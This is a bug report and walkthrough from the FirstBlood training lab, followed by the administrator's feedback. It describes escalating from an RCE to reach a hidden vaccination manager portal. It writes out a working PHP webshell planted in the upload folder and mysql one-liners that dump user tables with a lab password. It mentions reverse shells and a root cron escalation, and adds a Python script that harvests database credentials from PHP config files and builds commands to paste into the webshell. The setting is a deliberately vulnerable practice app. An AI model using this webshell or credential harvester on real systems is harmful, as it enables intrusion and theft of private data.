FirstBlood-#771: Finding and logging into the vaccination portal
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-28, twsec Level 2 reported:

After having an RCE through the deserialization bug, an attacker can wreak havoc on any machine. In our case I poked around and found a hidden login.php and portal.php for the vaccination manager.

Now we enter login.php, but we're presented with a login, so we need a username and a password, and because we have an RCE we poke around more until we find several important files:

the config.php.template. Now we know the username and the database name, but we're short of the password, since here it's just a variable, so we poke around more, especially in the include folder,

and we find the config.php file. Now to connect to MySQL and extract the data: since we have RCE we could create a reverse shell back to our server, or upload a webshell to the server; both work.

An example of a webshell:

After we have RCE and connect back to our server, we could write this script and create a web shell (single quotes around the PHP, so the shell does not expand $_GET or break on the inner double quotes):

echo '<?php echo system($_GET["cmd"]); ?>' > /app/firstblood/upload/cmdshell.php

We save it in the upload folder since it has write access and then give cmdshell.php execution rights: chmod +x cmdshell.php

And now navigate to firstblood.com/upload/cmdshell.php?cmd= and give it your commands.

The benefit of having a webshell is that it's on the server, and you don't have to worry about connectivity problems with your server.

Back to our subject: we need to log into the database, and since we don't have an interactive shell we need a one-liner mysql command.

Some wrote the command:

mysql -u firstblood -p a5H0uQkkkM7SxvSOE4xhimg93qhcFk -D firstblood -e "show tables;"

It worked for them but not for me; I had to do the following:

echo "show tables;" | mysql --database=firstblood --user=firstblood --password=a5H0uQkkkM7SxvSOE4xhimg93qhcFk
echo "select * from users;" | mysql --database=firstblood --user=firstblood --password=a5H0uQkkkM7SxvSOE4xhimg93qhcFk
echo "select * from vaccination_managers;" | mysql --database=firstblood --user=firstblood --password=a5H0uQkkkM7SxvSOE4xhimg93qhcFk

The password changes every time, so it might be different in my screenshots of the tables.

Users in the users table:

Users in vaccination_managers:

Now we know the username and the password, and we log into the vaccination portal.

P1 CRITICAL

Endpoint: /vaccination-manager/login.php

Parameter: login.php

Payload: providing the username and password


FirstBlood ID: 35
Vulnerability Type: RCE

A cronjob is set to execute the file /app/firstblood/scheduler.php every minute under the root user. This file is writable by the firstblood php pool user (fb-exec). The [checkproof bug] can be combined with this to obtain root privileges.
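The credential-hunting and one-liner MySQL steps described in the report above, as an added example that is not part of the original report or of FirstBlood itself: a small Python script that pulls database credentials out of a PHP config file and builds a mysql command line that runs without an interactive shell. The config.php and config.php.template contents below are constructed samples (the page does not show the real files), the alias list of setting names is an assumption, and the sample password is made up.

```python
"""Post-RCE credential triage (added example, not code from the FirstBlood
report): find database credentials in a PHP config file and build a mysql
command line that works from a webshell, where there is no TTY and no prompt.

Assumptions: the config.php layouts below are constructed samples; the real
FirstBlood config.php and config.php.template are not shown on the page."""
import re
import shlex

# Three layouts PHP configs commonly use for a setting. A value that is a
# variable reference, e.g. define('DB_PASS', $db_password), deliberately does
# not match: that is the config.php.template case from the report, where the
# password "is just a variable".
_DEFINE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*(['"])(.*?)\2\s*\)""")
_VAR = re.compile(r"""\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""")
_ARRAY = re.compile(r"""['"](\w+)['"]\s*=>\s*(['"])(.*?)\2""")

# Names under which each credential field is usually stored (assumed aliases).
ALIASES = {
    "user": ("db_user", "dbuser", "db_username", "username", "user"),
    "password": ("db_pass", "dbpass", "db_password", "password", "passwd", "pass"),
    "database": ("db_name", "dbname", "database", "db"),
    "host": ("db_host", "dbhost", "hostname", "host"),
}


def extract_db_creds(php_source: str) -> dict:
    """Return whichever of user/password/database/host have a literal value."""
    literals = {}
    for pattern in (_DEFINE, _VAR, _ARRAY):
        for match in pattern.finditer(php_source):
            name, value = match.group(1).lower(), match.group(3)
            literals.setdefault(name, value)
    creds = {}
    for field, names in ALIASES.items():
        for name in names:
            if name in literals:
                creds[field] = literals[name]
                break
    return creds


def mysql_argv(creds: dict, query: str) -> list:
    """argv for one query run from a webshell (no TTY, so no password prompt).

    The password goes in as --password=VALUE. The short form must be glued on
    (-pVALUE): with "-p VALUE", mysql prompts for the password and takes VALUE
    as the database name, which is why the spaced variant fails here."""
    if "password" not in creds:
        raise ValueError("no literal password in this file (a template?)")
    return [
        "mysql", "--batch",
        "--host=" + creds.get("host", "localhost"),
        "--user=" + creds["user"],
        "--password=" + creds["password"],
        "--database=" + creds["database"],
        "-e", query,
    ]


def mysql_cmdline(creds: dict, query: str) -> str:
    """Shell-quoted form of mysql_argv, ready to paste into ?cmd=."""
    return shlex.join(mysql_argv(creds, query))


# Constructed samples standing in for the two files named in the report.
CONFIG_TEMPLATE = """<?php
define('DB_HOST', 'localhost');
define('DB_USER', 'firstblood');
define('DB_NAME', 'firstblood');
define('DB_PASS', $db_password);
"""
CONFIG_REAL = """<?php
define('DB_HOST', 'localhost');
define('DB_USER', 'firstblood');
define('DB_NAME', 'firstblood');
define('DB_PASS', 'Ex4mpleP4ss');
"""
CONFIG_VAR_STYLE = """<?php
$dbhost = "127.0.0.1";
$dbuser = "app";
$dbpass = "s3cret";
$dbname = "appdb";
"""

if __name__ == "__main__":
    for label, src in (("config.php.template", CONFIG_TEMPLATE),
                       ("include/config.php", CONFIG_REAL)):
        creds = extract_db_creds(src)
        print(label, creds)
        if "password" in creds:
            print(mysql_cmdline(creds, "select * from vaccination_managers;"))
```

Running the script prints the template's partial credentials (no password, as the report found) and, for the real config, a complete command line. Passing the password on the command line shows it to every local user via ps; inside a lab that is acceptable, but the MYSQL_PWD environment variable avoids it.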

Report Feedback

@zseano

Creator & Administrator


Hi twsec, this is technically still using the RCE bug to poke further. This isn't actually something we advise doing on bug bounty programs, and accessing sensitive information such as DB tables could result in you maybe getting in trouble. Be careful when testing on BB programs :) There is a way to access this portal without needing to use RCE to obtain the password. Great report though, and great PoC :)